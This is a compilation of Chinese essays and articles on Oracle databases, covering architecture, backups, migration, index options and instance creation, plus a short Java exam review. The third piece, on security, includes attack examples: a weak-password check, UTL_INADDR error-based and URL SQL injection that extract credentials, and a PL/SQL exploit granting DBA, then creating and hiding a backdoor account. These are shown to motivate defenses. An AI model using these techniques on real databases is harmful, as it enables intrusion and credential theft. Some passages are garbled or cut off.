oracle数据库心得体会(精选14篇)
oracle数据库心得体会 第1篇
学习Oracle数据库的心得体会
对于学习Oracle数据库,应该先要了解Oracle的框架。它有物理结构(由控制文件、数据文件、重做日志文件、参数文件、归档文件、密码文件组成),逻辑结构(表空间、段、区、块),内存分配(SGA和PGA)算机的实际内存中得以分配,如果实际内存不够再往虚拟内存中写,后台进程(数据写进程、日志写进程、系统监控、进程监控、检查点进程、归档进程、服务进程、用户进程),SCN(System Change Number)。这些东西感觉都比较专业,我对它们也就是个知道,想要真真去认识我还得努力去做。虽然懂得还不是很多,起码会了基本的软件操作,老师说我们用的都是客户端,服务端看不到,也不知道服务端是什么样的,只知道客户端就挺多东西的,没有真正的去学习利用是很难掌握的。
Oracle数据库的学习使我对数据库的有了新的进步,以后再看到也就不至于什么也不懂,其实那么多数据库我觉得学好一门就行,只是他们的语言可能不大一样,学好一门后就可去认识其它的,这样应该有事半功倍的效果。就像我学习C语言,当时不能说是学习的棒,但不算差。所以我对以后的语言感觉都不是很困难,了解了ASP.NET、C++还有网页中用的Html语言、asp语言都能看懂,起码可以对别人的东西进行了一下修改。因此,我感谢Oracle数据库老师给了我有用的知识,以便我在以后学习或认识更多的内容能有新的方法和思维,也能更加有效和快速的去消化吸收新的东西。希望在今后中,Oracle能给我更多帮助,让我在我熟悉的ASP.NET中运用上去,我以前的一个目标是要为学校的选课做一个选课助手来帮助大学。不过因为种种原因一直没有完成,也包括我对数据库的不了解,因为学了Oracle以后知道第一项内容是通过SQL查询后得到的,如果去把它们联系起来还不是真正明白,不过我相信我的目标能在学习Oracle后得到进展。
oracle数据库心得体会 第2篇
092909 谢弘毅
经过助教对oracle和sybase数据库的讲解后,我下载使用和体验了这两个数据库,但主要的还是使用了Oracle数据库,经过一段时间的使用,对其使用有了一定的心得体会,并且通过阅读资料对其现在的前景状况有了一定的了解。
【选择Oracle的原因】
(1)在Gartner/Dataquest报告中Oracle依然在主流操作系统Unix和Linux, Windows NT/2000/XP上的关系数据库市场上占据绝对的领先地位,在UNIX上占63%, Windows+Unix上占49.9%。在关系型数据库市场(包括AS/400,Mainframe),Oracle以39.8%仍然处于领先地位。
(2)Oracle数据库依然是Fortune 100公司的首选数据库,其中51%的Fortune 100公司选用Oracle Database作为构建企业的传统应用和电子商务平台。
(3)Oracle数据库与Sybase数据库相比,无论从体系架构、并行支持、完整性控制等各方面均有很大的优势。
【Oracle相比于sybase的优势】(1)体系结构的比较
Oracle采用多线索多进程体系结构,直接在内核中支持分布式数据库操作、多线索处理、并行处理以及联机事务处理等。Sybase采用单进程多线索体系结构,其核心是SQL Server
(2)多线索多进程与单进程多线索的比较
Oracle和Sybase都采用多线索。Oracle多服务器进程结构,能实现数据库事务的并行处理,提高并发事务处理的响应速度。并且多服务器结构具有非常灵活的扩充性,当硬件平台处理能力提高时,服务器进程的个数也能随之增加,数据库性能也随之提高。Sybase采用单进程多线索方式。当并发用户数达到一定的数量时,会引起系统处理性能大大下降,和服务器进程瓶颈及死锁等现象;同时系统的可扩展余地非常狭窄。
(3)联机事务处理
Oracle的多线索技术在相同硬件环境下,所支持的用户数是其他数据库 系统的5至10倍。
【我对Oracle一些概念的理解】
(1)ORACLE SERVER
一个运行着的ORACLE数据库就可以看成是一个ORACLE SERVER,该SERVER由数据库(Database)和实例(Instance)组成,在一般的情况下一个ORACLE SERVER包含一个实例和一个与之对应的数据库。
一系列物理文件(数据文件,控制文件,联机日志等)的集合或与之对应的逻辑结构(表空间,段等)被称为数据库,简单的说,就是一系列与磁盘有关系的物理文件的组成。ORACLE内存结构和后台进程被成为数据库的实例,一个实例最多只能安装(Mount)和打开(Open)在一个数据库上,负责数据库的相应操作并与用户交互。
实例与数据库的关系如下图所示:
图一 ORACLE SERVER
(2)ORACLE内存结构(Memory structure)Oracle内存结构主要可以分共享内存区与非共享内存区,共享内存区主要包含SGA(System Global Area),非共享内存区主要由PGA(Program Global Area)组成,可以用如下图形表示。
图二 ORACLE MEMOERY STRUCTRUE
(3)后台进程(Background process)后台进程是Oracle的程序,用来管理数据库的读写,恢复和监视等工作。Server Process主要是通过他和user process进行联系和沟通,并由他和user process进行数据的交换。在Unix机器上,Oracle后台进程相对于操作系统进程,也就是说,一个Oracle后台进程将启动一个操作系统进程;在Windows机器上,Oracle后台进程相对于操作系统线程,打开任务管理器,我们只能看到一个ORACLE.EXE的进程,但是通过另外的工具,就可以看到包含在这里进程中的线程。
Oracle系统有5 个基本进程他们是:
DBWR(数据文件写入进程):将修改过的数据缓冲区的数据写入对应数据文件,维护系统内的空缓冲区。 LGWR(日志文件写入进程):将重做日志缓冲区的数据写入重做日志文件。
SMON(系统监护进程):工作主要包含:清除临时空间,在系统启动时,完成系统实例恢复,聚结空闲空间,从不可用的文件中恢复事务的活动,OPS中失败节点的实例恢复等。
PMON(用户进程监护进程):主要用于清除失效的用户进程,释放用户进程所用的资源。
CKPT(检查点进程,同步数据文件, 日志文件,控制文件):同步数据文件,日志文件和控制文件,由于DBWR/LGWR的工作原理,造成了数据文件,日志文件,控制文件的不一至,这就需要CKPT进程来同步。CKPT会更新数据文件/控制文件的头信息。
(4)ORACLE的物理结构 1)数据文件
每一个ORACLE数据库有一个或多个物理的数据文件(data file)。一个数据库的数据文件包含全部数据库数据。逻辑数据库结构(如表、索引)的数据物理地存储在数据库的数据文件中。数据文件有下列特征:
一个数据文件仅与一个数据库联系。 一旦建立,数据文件不能改变大小
一个表空间(数据库存储的逻辑单位)由一个或多个数据文件组成。
数据文件中的数据在需要时可以读取并存储在ORACLE内存储区中。例如:用户要存取数据库一表的某些数据,如果请求信息不在数据库的内存存储区内,则从相应的数据文件中读取并存储在内存。当修改和插入新数据时,不必立刻写入数据文件。为了减少磁盘输出的总数,提高性能,数据存储在内存,然后由ORACLE后台进程DBWR决定如何将其写入到相应的数据文件。2)日志文件
每一个数据库有两个或多个日志文件(redo log file)的组,每一个日志文件组用于收集数据库日志。日志的主要功能是记录对数据所作的修改,所以对数据库作的全部修改是记录在日志中。在出现故障时,如果不能将修改数据永久地写入数据文件,则可利用日志得到该修改,所以从不会丢失已有操作成果。
日志文件主要是保护数据库以防止故障。为了防止日志文件本身的故障,ORACLE允许镜象日志(mirrored redo log),以致可在不同磁盘上维护两个或多个日志副本。
日志文件中的信息仅在系统故障或介质故障恢复数据库时使用,这些故障阻止将数据库数据写入到数据库的数据文件。然而任何丢失的数据在下一次数据库打开时,ORACLE自动地应用日志文件中的信息来恢复数据库数据文件。3)控制文件
每一ORACLE数据库有一个控制文件(control file),它记录数据库的物理结构,包含下列信息类型:
数据库名;
数据库数据文件和日志文件的名字和位置; 数据库建立日期。
为了安全起见,允许控制文件被镜象。
每一次ORACLE数据库的实例启动时,它的控制文件用于标识数据库和日志文件,当着手数据库操作时它们必须被打开。当数据库的物理组成更改时,ORACLE自动更改该数据库的控制文件。数据恢复时,也要使用控制文件。
【我对Oracle图形界面使用心得】
Oracle数据库是一个大型系统,具有强大的数据定义、操纵、组织和存储和维护等管理功能,还具有一定的数据通信接口功能,且分有图形操作界面和文本操作界面。听老师说学习数据库技术就是要学习其语言,熟悉掌握文本操作能有效提高数据库技术。但作为一个初次与实体数据库接触的学生,我更喜欢图形操作界面。在几次尝试中我有以下体会: 【优点】
(1)图形界面给人的第一印象就是直观,相比起纯语言的模式,图形界面能更好的体现你的操作。因为学习数据库以来,老师所讲解的都是一些查询语言,和命令行之类的语言的知识。而通过直观的图形界面,使我数据库的基本结构(物理存储结构、逻辑存储结构)有了更为深刻的了解体会,看到了oracle数据库的一些优秀的特性。和一些优秀的操作功能。
(2)使用图形界面能够更加快捷且准确的行使数据库的各种操作。因为oracle数据库支持图形等操作,使得一些需要用SQL语句或是命令行的操作可以通过简单的拖放点击图形即可完成,这一方面减少了错误的发生,一方面也简化了工作任务。
(3)图形操作界面包含了语句操作的所有功能,而且还能通过教程或是文档获得帮助,这使得你能在使用的过程中克服一些困难。最重要的是,在图形界面的使用过程中你可以直观清晰的看到各种操作产生的结果,加深你对数据库中各种关系的理解。
【缺点】
(1)使用图形界面不能做到像语言命令操作的多变性,一部分操作通过语言能够简单化,例如对于很多对象的查询和修改,就比较适合用语言操作,这体现了图形界面操作的局限性。
(2)图形界面所占用系统资源大,不利于多用户的并行操作。也减低了系统的处理能力。最关键的是图形界面不容易维护和修改对象(3)无逻辑
图形操作是一个非结构化的操作集合,先后顺序完全掌握在操作者手中。这种操作过程很容易出错,而文本操作着可以利用语句有效控制。
【总结】
Oracle数据库安全 第3篇
为什么需要oracle数据安全, 据统计截止2009年底, 据相关部门调查, 在德国741家公司中有被数据库入侵的家数高达百分之83.6, 造成直接经济损失2.8亿欧元。并按照被入侵次数按每年10%的速率增长, 受影响部门有销售部、设计部、人事部和市场部。攻击者大多是内部员工和业界竞争者。
又根据调查每个中等规模的公司, 大约需要1000左右的oracle数据库实例, 相当于300个生产数据库, 但是其中核心的数据库实例只占2%-5%, 平均每个DBA要管理30-100个数据库实例。10-20%的数据库是过期的版本, 80-90%的数据库运行相同的版本。
一般数据库应用中我们采用的结构为客户端、中间件和数据库服务器三层结构。即使这样我们还是有漏洞, 如没有统一的认证系统, 不能定时的更换密码, 在杀毒和防木马软件方面财力投入不够, 管理上缺乏安全意识等。
二、问题与解决方式
三、黑客攻击举例
1、弱密码攻击举例:
黑客可以通过命令c:>checkpwd system/secretpw@ora10104local password_file.txt进入本地文件glogin.sql和login.sql文件, 还可以通过sqlplus sys@ora10g4as sysdba连接glogin.sql文件, 从而达到创建用户和修改提升权限的目的。
2、利用系统漏洞:
在url_inaddr中默认有授权公共账户的域名解析, select utl_inaddr.get_host_name (127.0.0.1’) fromdual;通过修改错误信息得到系统账户, select url_addr.get_host_name ( (select username||=’||password from dba_users where rownum=1) ) from dba_users where rownum=1) ) from dual;从而得到系统密码。
3、通过SQL注入攻击:
http://ec.*****/prelex/detail_dossier_real.cfm?CL=en&Dosld=124131||url_inaddr.get_host_name ( (select%20’SID=’||global_name%20from%20global_name) ) , 这样可以得到SID, 同样道理通过改上述字段中的global_name为all_users可以得到相关用户信息。
4、PL/SQL入侵:
介绍一个典型的PL/SQL入侵create or replace function F1 return number authid current_user as pragma autonomous_transaction;begin execute immediategrant dba to public’;commit;return 1;end;/Expolit exec sys.kupw$WORKER.main (x’, ’YY’’and1=user1.f1–mytag12’) ;最后通过relogin或者运行set role dba变为DBA。 (create user hacker identified by hacker;crant dba to hacker;一些经验老道的黑客会隐藏自己的身份update sys.user$set datats#=777;
Commit;测试sqlplus hacker/hacker
四、解决方案
1、测试打开2-3个典型数据库
2、尝试定位问题所在
3、修复问题
4、安装补丁修改策略
5、扫描更多的数据库
五、介绍几款扫描工具
1、Sentrigo Hedgehog (图形加命令行的高级扫描漏洞软件)
2、RDSrepscan (容易上手的网页界面数据库扫描软件)
总结
1、数据库安全是一个循序渐进的过程, 它需要不断地修复和查找漏洞。
2、需要设置防火墙和入侵检测系统辅助管理员实施。
oracle数据库迁移 第4篇
摘 要:本文介绍了Oracle数据库基于Linux系统迁移的研究问题。在数据库领域一直处于领先地位的Oracle数据库以其良好的可移植性、可靠性和高效性,倍受各级用户的推崇和喜爱。随着Oracle数据库的不断更新和发展,其使用用户的群体也在不断的增加,因此对Oracle数据库的存储迁移技术的研究在国内外如雨后春笋般不断发展。
关键词:oracle,数据迁移,跨平台
中图分类号: TP391 文献标识码: A 文章编号: 1673-1069(2016)25-195-2
0 引言
伴随着IT行业的迅速发展,IT系统中数据的安全性,已经是对企业运营产生了重大影响。而数据库的安全迁移也为IT系统的可持续运行和数据安全提供一道保护屏障。而且近年来频繁出现的自然灾害或者突发事件也让越来越多的人们意识到,原有的数据存储方式已经无法满足企业的需要。本文正是从数据库迁移的实际操作中总结整理而成。
1 oracle数据库文件构成
数据库是一种物理的存储结构,它是由多种物理文件组成的,在Oracle数据库系统中分为,核心文件和非核心文件两大类[1]。其中核心文件由数据文件,控制文件,日志文件,参数文件组成,非核心文件由密码文件,告警日志文件,各种跟踪文件组成。
控制文件:控制文件是一个二进制的文件,它描述了数据库当前的物理状态,记录了RMAN备份的元数据。控制文件包含有数据库的名称、数据库的创建信息、表空间的信息、数据文件的状态、日志文件的信息、备份的信息、检查点的信息等。
数据文件:,一个数据库中一定至少有一个数据文件(system01.dbf),如果一个数据库存在多个数据文件,应该分别把它们存放在不同的磁盘上,这样做不仅可以提高数据的存取速度,有利于提高数据库的性能,而且还能防止数据文件同时被损坏,实现高度容灾。
日志文件:数据库日志文件包括归档日志和非归档日志,记录了数据库的所有修改信息,归档日志会在数据库切换日志时,备份历史日志,日志记录的是数据库改变的信息、因此当数据库损坏时可以通过日志文件实现数据库的完全恢复、不完全恢复,而非归档日志不会备份历史日志,只能恢复到数据库最后一次备份时的状态[2]。
临时文件:创建数据库对象的时候指定的是使用表空间,一个表空间至少包含一个数据文件,临时文件是临时表空间对应的数据文件,并不是已用完就被删除的,而是指这个文件存储的对象是临时存在的对象。临时文件主要用于大量的排序的时候,如果不能在数据库的内存中做排序,就会把临时文件作为中转。
参数文件:参数文件是记录数据库系统配置的文件,每次数据库一启动,Oracle就会自动地从参数文件中读取系统参数的设置来配置并启动数据库。如内存的大小分配,此次启动可以打开的进程数和会话数等。
2 Oracle数据库迁移的迁移方案
oracle数据库状态分类:
nomount:此状态可以读取初始化参数文件,启动实例,可以进行数据库的创建。
mount:数据库维护状态,读取控制文件。
open: 打开数据文件,日志文件,是数据库可以对全体用户提供服务了。
数据库物理迁移过程大体可分为以下四个步骤:
第一步:加载初始化文件
oracle启动后,数据库默认会读取一个二进制的初始化文件spfile
第二步:加载控制文件,保证在初始化文件中,控制文件的路径正确
在初始化文件中定义控制文件的位置,在确保控制文件路径正确的情况下,才能对控制文件进行加载,其命令是alter database mount。
第三步:加载数据库,包括重做日志文件
加载控制文件之后,执行命令alter database open对数据库进行开启,整个数据库启动过程完成了。
第四步:启动数据库成功之后,就说明迁移成功,可以观察数据是否丢失,然后启动监听和配置文件等。
3 Oracle数据库迁移具体实践
下面以把数据库从文件系统迁移到ASM磁盘组为例进行演示步骤:
首先,ASM是把多个磁盘组织为一个磁盘组,作为Oracle的逻辑卷管理器,利用ASM技术可以把数据均匀分布在这些磁盘上来解决从文件区到物理磁盘块的映射问题。这种设计除了定位文件区非常快速之外,还在增加或删除磁盘时有所帮助,因为文件区的位置不需要调整[3]。
把数据库从文件系统迁移到ASM磁盘组主要是把数据库的控制文件,数据文件和日志文件分别放在不同的磁盘组上,实现对这些文件的一个冗余放置,还简化了对数据文件的管理。
3.1 迁移数据库
①迁移数据库前先在RMAN下备份数据库,设置系统冗余度,并打开优化器和控制文件的自动备份功能
②创建迁移的控制文件存放的目录
③修改参数文件把控制文件的默认位置修改到ASM磁盘组上,然后用Pfile来生成spfile文件
SQL> create pfile from spfile;
④利用RMAN工具恢复控制文件,将数据库启动到mount状态;加载控制文件,如果出现错误,就说明控制文件所在的路径和参数文件路径不一致,要修改初始化参数,文件中控制文件的参数,然后重新加载。
4 总结与展望
数据库管理技术是现今社会中信息科学与技术的重要组成部分,数据库迁移技术的研究保证了数据安全以及高效的存储[4][5]。在实际操作过程中,Oracle数据库基于Linux系统的迁移过程中会出现各种各样的情况,如果想要安全完整的迁移数据库,一定要先做好备份,然后反复的实验验证,最终才能保证数据库完整安全的迁移。
参 考 文 献
[1] 张敏.数据库安全研究现状与展望[J].中国科学院院刊,2011.03.
[2] 赵钦,周丹.政府办公自动化信息系统数据迁移解决方案[J].广西科学院学报,2008.24.
[3] 段卫国,李俊春.Oracle 数据库数据迁移技术研究[J].信息技术,2015.8.
[4] Kathy Rich.Oracle Data Pump,10g Release 2 (10.2)[M].Oracle Database Utilities, 2005.
数据库oracle笔试 第5篇
我在考场上写的n=5, i=2; 运行得出结果却为9. 分析了一下得出原因在于: 如果n<5的话,那么它会从其自身起一直到5都会执行j++这条语句, 因为此代码片段中并没有使用 break。
n与i有多种组合值, 如(1,1)、(4,1)和(5,1)等都可以。
3、复习JAVA的 “内部类”章节。
4、复习JAVA的` “反射”章节。
5、温习操作系统 部分的知识。
6、数组问题:
如我声明 int [] a = new int[1] , 那么a[0]的默认值就为0。 我起初理解错误了, 我认为如此声明只是为数组开辟了空间而已, 在其空间上默认值为NULL。
7、关于启动 gc 的方法:
System.gc 和 RunTime()类的 gc() 方法, 但是即使调用了前面的方法也不保证一定会进行回收。
拓展之:
a. GC并不是定期来回收你的垃圾内存,即是根据需要来回收。
b. GC的回收是因为:它认为你的系统已经开始内存紧张(这个就是jvm的神奇)
c. 即使GC开始准备清理你的垃圾内存,但是如果该内存的引用还存在(不等于null), 这个时候GC仍然无能为力!
d、RunTime类的 public static Runtime getRuntime() 返回: 与当前 Java 应用程序相关的 Runtime 对象。
8、int i=10, double e = 10.0; 判断(i==e)、(i==10.0)的真假。
我认为一个是int类型,一个是double类型,它们分属不同的类型, 所以我认为其是错误的, 然而经运行测试发现是正确的。
9、public static void main(String[] args){
StringBuffer str1 = new StringBuffer(“a”);
StringBuffer str2 = new StringBuffer(“b”);
Oracle数据库备份技巧 第6篇
每周一次备份主数据库。如果你创建、修改或者停止一个数据库,添加新的sql server消息,添加或者停止连接服务器,或者添加记录设备,那就进行手工备份。
每天备份一次msdb数据库。它一般非常小,但很重要,因为它包含了所有的sql server工作、操作和计划任务。
只有当你修改它时,才有必要备份模型数据库。
用sql server agent来安排你的备份工作的时间表。
如果在你的生产(production)环境中有现成资源,备份生产数据库到本地磁盘或者网络服务器(用同一个开关)。然后,把备份文件/设备拷贝到磁带上。在存在许多硬件故障(特别是在raid系统中)的情况下,磁盘常常是完好的(inact)。如果备份文件是在磁盘上,那么恢复时的速度会提高很多。
备份开发和测试数据库至少要用到simple恢复模型。
除了有计划的定时备份外,在进行未记录的(nonlogged)批操作(如,批拷贝)、创建索引、或者改变恢复模型后要备份用户数据库。
如果你使用的是simple恢复模型,记住在截短(truncate)交易记录之后备份你的数据库。
用文档记录你的恢复步骤。至少要大概记录这些步骤,注意所有的重要文件的位置。
--------------------------------------------------------------------------------
在截短记录之前,也就是所有的已提交(committed)交易从记录中清空之前,所有的这些信息都保存在交易记录中。在simple恢复模型中,记录在一个checkpoint期间内截短(在sql server内存缓冲写道磁盘时),它是自动发生的,但也可以手动执行。这也就是simple恢复模型不支持时间点(point-in-time)恢复的原因。在full和bulk_logged恢复模型下,当交易记录被备份时,交易记录被截短,除非你明确指出不进行截短。
为了备份交易记录,使用backup log命令。其基本语法与backup命令非常相似:
backup log { database } to
下面是如何把交易记录备份到一个名为logbackupdevice的逻辑设备上的例子:
backup transaction northwind to logbackupdevice
如果你不希望截短交易记录,使用no_truncate选项,如下所示:
backup transaction northwind to logbackupdevice with no_truncate
只是基本知识。
改善Oracle的索引数据库 第7篇
当我们使用CREATE INDEX来创建索引时,Oracle提供了很多参数来改善创建索引的速度、索引所占用的空间和索引树的层次。
1、速度因素
PARALLEL选项:当创建索引时,Oracle首先会进行全表扫描来收集符号键和ROWID对,而PARALLEL选项允许多处理器并行扫描表,这样就会加速索引的创建过程,
一般推荐的PARALLEL值为CPU数减1。
NOLOGGING选项:NOLOGGING选项因为不写日志,所以大大提高了性能,比不使用NOLOGGING选项大约会节省70%的时间。使用NOLOGGING创建索引的唯一风险就是如果数据库需要做前滚恢复,你将不得不重建索引。
2、空间和结构因素
COMPRESS选项:COMPRESS选项用于在创建非唯一性索引时压缩重复值。对于连接索引(即索引包含多列)来说,COMPRESS选项会使索引的大小减少一半以上。COMPRESS选项也可以设置连接索引的前置长度。
使用大BLOCKSIZE的表空间:将索引建立在大BLOCKSIZE的表空间上,将大大降低索引树的层次。
Oracle数据库备份策略 第8篇
不管数据库如何精心设计、配置和优化,它们都难免会出现系统或硬件故障,如:语句故障、用户进程故障、实例故障、介质故障等。一旦数据库出现故障将给用户数据带来灾难性的结果。因此数据库管理员必须采取必要的备份策略以避免数据灾难的发生。
Oracle提供了强大的备份策略,其备份方式分为物理备份和逻辑备份两大类型。物理备份是数据库文件拷贝的备份,根据备份时数据所处状态的不同,物理备份又可分为脱机备份(冷备份)和联机备份(热备份);逻辑备份是对数据库逻辑组件(表、存储过程等数据库对象)的备份,逻辑备份使用Exp命令将数据库中相应的逻辑对象存储为二进制文件。
2 脱机备份
脱机备份是在数据库被正常关闭之后进行的数据文件的物理备份。当数据库正常关闭时,将数据库的所有数据文件、控制文件、参数文件、口令文件、重做日志文件都拷贝到备份介质中。这些文件因而保持着数据关闭时的完整的映象,对于备份Oracle信息而言,脱机备份是最快和最安全的方法。
2.1 脱机备份的优点
1)是非常快速的备份方法(只需拷文件)
2)容易归档(简单拷贝即可)
3)容易恢复到某个时间点上(只需将文件再拷贝回去)
4)能与归档方法相结合,做数据库“最佳状态”的恢复。
5)低度维护,高安全性。
2.2 脱机备份的方法
1)关闭数据库shoutdown normal;
2)将数据文件、控制文件、参数文件(可选)、联机重做日志文件及存档日志文件(Oracle工作在Archivelog方式)拷贝到备份磁盘。
3)重新启动数据库startup open数据库名;
脱机备份操作简单、安全可靠,但脱机备份只能恢复到数据库被关闭时的状态,同时只有在关闭数据库的状态下才能进行备份操作。实际应用中很多情况下数据库必须不间断的工作,不可能使用脱机备份数据库,在这种情况下只能采用联机备份。
3 联机备份
联机数据库备份是不一致备份,因为在备份过程中数据库中的部分数据可能被修改,因此数据库一旦出现故障只能利用备份文件与归档日志做完全或不完全的恢复,此时数据库必需工作在Archivelog方式。
3.1 Archivelog方式下的备份策略
1)在初始建立数据库时,执行脱机全数据库备份,这是整个数据库备份的基础,它保存着全部原始数据库文件和控制文件的备份;
2)定期进行全数据库备份(联机备份);
3)每次对数据库进行结构修改时,必须进行控制文件备份。
3.2 联机备份的方法
在数据文件备份之前,对应的表空间必须通过使用ALTER TABLESPACEBEGIN BACKUP以备份方式放置。然后组成表空间的数据文件可以使用类似脱机备份的操作系统命令进行拷贝。在数据文件用操作系统命令拷贝后,应使用ALTER TA-BLESPACEEND BACKUP命令使表空间脱离联机备份方式。同时用ALTER DATABSEBACKUP CONTROLFILE命令备份控制文件。(下转第4365页)(上接第4363页)
联机备份没有必要备份联机日志,但必须是归档状态,在实例恢复的时候,可能需要用到归档日志。当前联机日志一定要保护好或是处于镜像状态,当前联机日志的损坏,对于数据库的损坏是巨大的,只能以数据的丢失来进行数据库的恢复工作。
对于临时表空间,存放的是临时信息,在联机备份是也可以考虑不用备份,如果临时文件发生故障,可以删除该数据文件与表空间,重建一个临时表空间。
3.3 联机备份的优点
1)可在表空间或数据文件级备份,备份时间短。
2)备份时数据库仍可使用。
3)可达到秒级恢复(恢复到某一时间点上)。
4)可对几乎所有数据库实体作恢复。
5)恢复是快速的,在大多数情况下在数据库仍工作时恢复。
当备份的数据量不是太大,需要经常性的数据备份时,可以使用逻辑备份。ORACLE数据库的逻辑备份分为三种模式:表备份、用户备份、表空间备份和完全备份。
表模式:备份某个用户模式下指定的对象(表)。
exp用户名/密码@适配器tables=(table list)file=备份文件名。
用户模式:备份某个用户模式下的所有对象。
exp用户名/密码@适配器file=备份文件名owner=用户名。
表空间模式:备份整个表空间。
exp用户名/密码@适配器tablespaces=(tablespace list)file=备份文件名
完全备份:备份完整的数据库。
exp用户名/密码@适配器full=y file=备份文件名
对于数据库逻辑备份,建议采用增量备份,即只备份上一次备份后更改的数据。
4 结论
选择备份策略的依据是:丢失数据的代价与确保数据不丢失的代价之比。还有的时候,硬件的备份有时根本满足不了现实需要,假如你误删了一个表,但是你又想恢复的时候,数据库的备份就变的特别重要了。作为DBA,有责任从以下三个方面维护数据库的可恢复性:1)使数据库的失效次数减到最少,从而使数据库保持最大的可用性;2)当数据库不可避免地失效后,要使恢复时间减到最少,从而使恢复的效率达到最高;3)当数据库失效后,要确保尽量少的数据丢失或根本不丢失,从而使数据具有最大的可恢复性。
摘要:任何数据库系统都可能因人为或非人为的因素带来数据灾难。该文详细探讨Oracle数据库系统中所提供的强大的备份策略,以帮助数据库管理员最大限度地减少因数据灾难所带来的损失。
关键词:备份,联机备份,脱机备份,物理备份,逻辑备份
参考文献
[1]丁铖.Oracle8/8i数据库系统管理[M].北京:人民邮电出版社,2001.
[2]盖国强.循序渐进Oracle--数据库管理、优化与备份恢复[M].北京:人民邮电出版社,2007.
[3]袁福庆.Oracle数据库管理与维护手册[M].北京:人民邮电出版社,2006.
创建Oracle数据库的原则 第9篇
关键词:Oracle;数据库;原则
中图分类号:TP311.13 文献标识码:A文章编号:1007-9599 (2010) 14-0000-03
The Principle of Creating Oracle Database
Liu Yin
(China Airlines Clearing Co.,Ltd.,Beijing100028,China)
Abstract:In the China Aviation Clearing Corporation six years of work has been engaged in the Oracle applications database development and maintenance.Application process in the establishment of a database and found that many applications do not meet the Oracle database creation application of the principle database settings. This problem is prevalent in many systems,we consider the availability of more,while ignoring the performance of the database problems.I would like to work according to their own practical experience,according to Oracle applications to talk about the process of database creation and consideration should be noted that some basic principles and requirements.
Keywords:Oracle;Database;Principle
首先我想要申明的是,这个过程是根据NT上Oracle应用数据库建立过程来说明的,但是所说的原则同样适用于其他的操作系统平台(如UNIX)。虽然对于Oracle方面的高手来说,有一点班门弄斧的嫌疑,但是对于一个需要全面了解Oracle建立过程的初、中级用户,仍然还是大有益处的(这个例子中将要建立的实例名和数据库名设为VETO)。
一、初始化文件(initSID.ora)的建立
大家都知道要建立一个初始化文件(例如initAOMN.ora),这个文件可以用写字板进行编辑和修改。这个文件决定了实例的基本配置和性能,中间参数的大小需要根据具体的应用要求决定。用户还可以根据情况的变化,以后进行调整修改。
许多关键的参数Oracle公司都给了大、中、小三个标准,用户可以根据需要确定。除了要修改DB_NAME,将它改为将要建立的数据库名外,还有以下的几个参数要注意:
(一)CONTROL_FILES是指定控制文件的名称和位置。控制文件必须小于8个。但是为了防止控制文件毁坏而导致数据库的崩溃,建议将控制文件指定在不同硬盘上互做备份。文件名最好让人望名知意。
(二)SHARE_POOL_SIZE指的是共享池的大小,如果想加快SQL语句的处理速度,而且操作系统的内存足够的话,可以开大些加快速度
(三)DB_BLOCK_SIZE这个参数设置Oracle块的大小。对于OLTP(在线事务处理系统),应该设置得小点,而对于DDS(数据仓库)而言,应该设置得大点。一旦设定并且数据库建立以后时没有办法修改的。这个问题值得注意。
二、建立实例(Instance)
数据库的实例指的是为处理数据库而分配的内存结构和后台处理过程,它的配置和性能由上面的初始化文件决定的。为了在操作系统中建立这个实例,必须使用Oracle提供的Oradim工具。我们可以在NT Windows菜单的运行中输入:
ORADIM73 -NEW -SID VETO -USRPWD VETO -STARTTYPE SVRC,INST -STARTMODE AUTO -PFILE=D:ORANTDATABASEVETOINITVETO.ORA
这个命令的结果是在操作系统中建立了一个实例,并且实例的启动方式是自动。internal用户的密码是VETO,在系统的服务中建立了OracleStartVeto和OracleServiceVeto两个服务。在开始的时候OracleServiceVeto已经启动,但是OracleStartVeto可能没有启动。所以可用Net Start OralceStartVeto直接将OralceStartVeto和OralceServiceVeto启动,确保这个实例所需的服务都正常启动。即:C:NET START OracleServiceVeto
三、建立数据库(database)
实例的建立只是为数据库的建立做了一个准备,我们可以将实例付给任何一个数据库使用,只要数据库的参数MaxInstances没有被超过。建数据库需要用CREATE DATABASE命令,最好事先将参数写入一个SQL文件中,以被使用和今后的维护。我们需要了解建立数据库时,一些参数的意义,有利于我们对数据库性能的把握。
例如:这里用到的CREATE_DB_VETO.SQL
CREATE DATABASE VETO
CONTROLFILE REUSE
MAXLOGFILES 32MAXLOGMEMBERS 5MAXDATAFILES 50 MAXINSTANCES 2
LOGFILE GROUP 1 ('D:ORANTDATABASEVETOLOGVETO11.RDO',
'D:ORANTDATABASEVETOLOGVETO12.RDO')SIZE 1M,
GROUP 2 ('D:ORANTDATABASEVETOLOGVETO21.RDO',
'D:ORANTDATABASEVETOLOGVETO22.RDO')SIZE 1M
DATAFILE 'D:ORANTDATABASEVETOSYSTEMVETO.DBF' SIZE 100M
CHARACTER SET ZHS16cgb231280;
在这里我们需要注意以下几点要求:
(一)如果initVeto.ora文件中指定的controlfile已经存在才可以在建立数据库时使用CONTROLFILE REUSE,否则不能使用.
(二)MAXLOGFILES指最大的redo log file的group数。MAXLOGMEMBERS指最大的redolog file的group中的member数。MAXDATAFILES指数据库中最大的datafile数。MAXINSTANCES指数据库可被多少个instance使用数。这五个参数将会影响controlfile的大小
(三)LOGFILE指的是redo log file的设置,每个GROUP中的MEMBER文件的大小必须是大小相同的。由于redo log file是循环使用的,所以最少必须有两个GROUP,否则数据库无法建立。虽然每个GROUP的MEMBER文件可以只有一个,但是为了防止某个MEMBER文件的毁坏而导致数据库的不可用,必须在每个GROUP中有多个MEMBER,最好是每个GROUP有相同数目的MEMBER文件。建立数据库的SQL语句写好后,以internal用户进入,重新启动实例并进入数据库的nomount状态,建立数据库并打开数据库。
结果:INSTANCE启动,数据库是OPEN状态,数据库可以被使用。在建立数据库的过程中,数据库中所用到的基表都在这个过程由系统运行sql.bsq自动建立了。
四、建立动态性能视图(data dictionary view)
当数据库建立后,用户仍然不能用system用户的身份进入系统。这是由于数据库的基表虽然已经建立,但是动态性能视图没有建立,所以system的身份无法被系统确认。必须以sys或者internal用户的身份重新进入系统,运行catalog.sql和catproc.sql(这两个文件存在于目录%Oracle_homerdbms73admin中)。catalog.sql的目的是建立动态性能视图。catproc.sql的目的是建立运行SQL,PL/SQL所需的一些函数包和其他帮助工具包。虽然这个时候system用户可以登录数据库,但是可能系统要求运行pupbld.SQL,目的是防止系统设置的确省的profile不能被访问。
五、建立监听器(LISTENER.ORA)
